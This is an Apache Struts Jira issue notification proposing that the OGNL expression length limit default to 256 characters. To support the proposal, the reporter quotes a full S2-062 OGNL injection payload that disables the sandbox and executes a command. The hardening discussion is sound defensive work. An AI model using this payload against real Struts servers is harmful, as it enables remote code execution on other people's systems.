Posted to issues@struts.apache.org by "ASF subversion and git services (Jira)" <ji...@apache.org> on 2022/05/17 19:00:01 UTC

[jira] [Commented] (WW-5179) Set 'struts.ognl.expressionMaxLength' to 256 by default

    [ https://issues.apache.org/jira/browse/WW-5179?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17538416#comment-17538416 ] 

ASF subversion and git services commented on WW-5179:
-----------------------------------------------------

Commit 3f2518afa802d7ef57597b75c70ffb61de1d011a in struts's branch refs/heads/WW-5179-max-length from Lukasz Lenart
[ https://gitbox.apache.org/repos/asf?p=struts.git;h=3f2518afa ]

WW-5179 Set default value of struts.ognl.expressionMaxLength to 256


> Set 'struts.ognl.expressionMaxLength' to 256 by default
> -------------------------------------------------------
>
>                 Key: WW-5179
>                 URL: https://issues.apache.org/jira/browse/WW-5179
>             Project: Struts 2
>          Issue Type: Improvement
>          Components: Core
>            Reporter: tanli
>            Priority: Major
>             Fix For: 2.6
>
>
> struts.ognl.expressionMaxLength
> The default is set to 400.
> I reduced the S2-062 exploit:
>  
> %\{(#request.a=#@org.apache.commons.collections.BeanMap@{})+
> (#request.a.setBean(#request.get('struts.valueStack'))==true)+
> (#request.b=#@org.apache.commons.collections.BeanMap@{})+
> (#request.b.setBean(#request.get('a').get('context'))==true)+
> (#request.c=#@org.apache.commons.collections.BeanMap@{})+
> (#request.c.setBean(#request.get('b').get('memberAccess'))==true)+
> (#request.get('c').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
> (#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
> (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec(\{'calc'}))}
>  
> Its length is 709, so setting the default OGNL expression length to 400 could keep our app safe.
>  
> and!
>  
> I think Struts 2 can give a default number: an expression could have a limit on the number of '#' characters, like 10.
>  
> Thanks



--
This message was sent by Atlassian Jira
(v8.20.7#820007)